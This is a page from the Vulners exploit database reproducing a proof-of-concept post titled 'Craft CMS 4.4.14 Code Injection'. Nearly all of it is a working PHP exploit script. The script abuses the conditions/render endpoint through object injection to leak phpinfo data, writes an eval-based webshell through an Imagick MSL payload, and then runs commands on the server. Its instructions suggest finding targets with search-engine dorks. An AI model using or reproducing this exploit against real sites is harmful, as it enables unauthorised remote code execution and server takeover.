Vulners
Lucene search
Craft CMS 4.4.14 Code Injection
`=============================================================================================================================================
| # Title : Craft CMS 4.4.14 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://craftcms.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 116 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class CraftCMSExploit {
private $target_uri;
private $webshell;
private $config = ['upload_tmp_dir' => null, 'document_root' => null];
private $post_param;
private $get_param;
public function __construct($target_uri, $webshell = '') {
$this->target_uri = $target_uri;
$this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';
$this->post_param = $this->generateRandomString(1, 8);
$this->get_param = $this->generateRandomString(1, 8);
}
public function check_phpinfo() {
// Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()
$data = http_build_query([
'action' => 'conditions/render',
'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',
'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
]);
$response = $this->sendPostRequest($this->target_uri, $data);
if ($response) {
$this->parsePHPInfo($response);
}
}
private function parsePHPInfo($response) {
// Parses the phpinfo() HTML response to find upload_tmp_dir and document_root
if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {
$this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);
}
if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {
$this->config['document_root'] = trim($matches[1]);
}
}
public function upload_webshell() {
// Generates an XML payload to upload the webshell via Imagick MSL
$payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<image>
<read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />
<write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />
</image>";
$form_data = [
'action' => 'conditions/render',
'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',
'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',
'payload' => $payload
];
$response = $this->sendMultipartPostRequest($this->target_uri, $form_data);
return strpos($response, '502') !== false;
}
public function execute_command($cmd) {
// Executes a command on the server via the uploaded webshell
$payload = base64_encode($cmd);
$data = http_build_query([$this->post_param => $payload]);
return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);
}
private function sendPostRequest($uri, $data) {
$options = [
'http' => [
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => $data,
],
];
$context = stream_context_create($options);
return file_get_contents($uri, false, $context);
}
private function sendMultipartPostRequest($uri, $data) {
// Sends a multipart form-data POST request
$boundary = uniqid();
$delimiter = '------' . $boundary;
$post_data = $this->buildMultipartData($data, $delimiter);
$options = [
'http' => [
'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",
'method' => 'POST',
'content' => $post_data,
],
];
$context = stream_context_create($options);
return file_get_contents($uri, false, $context);
}
private function buildMultipartData($data, $delimiter) {
$post_data = '';
foreach ($data as $name => $content) {
$post_data .= "--$delimiter\r\n";
$post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";
$post_data .= "$content\r\n";
}
$post_data .= "--$delimiter--\r\n";
return $post_data;
}
private function generateRandomString($min, $max) {
$length = rand($min, $max);
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
}
}
// Usage
$exploit = new CraftCMSExploit('http://target-craftcms.com');
$exploit->check_phpinfo();
if ($exploit->upload_webshell()) {
echo $exploit->execute_command('whoami');
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Oct 2024 00:00Current
7.4High risk
Vulners AI Score7.4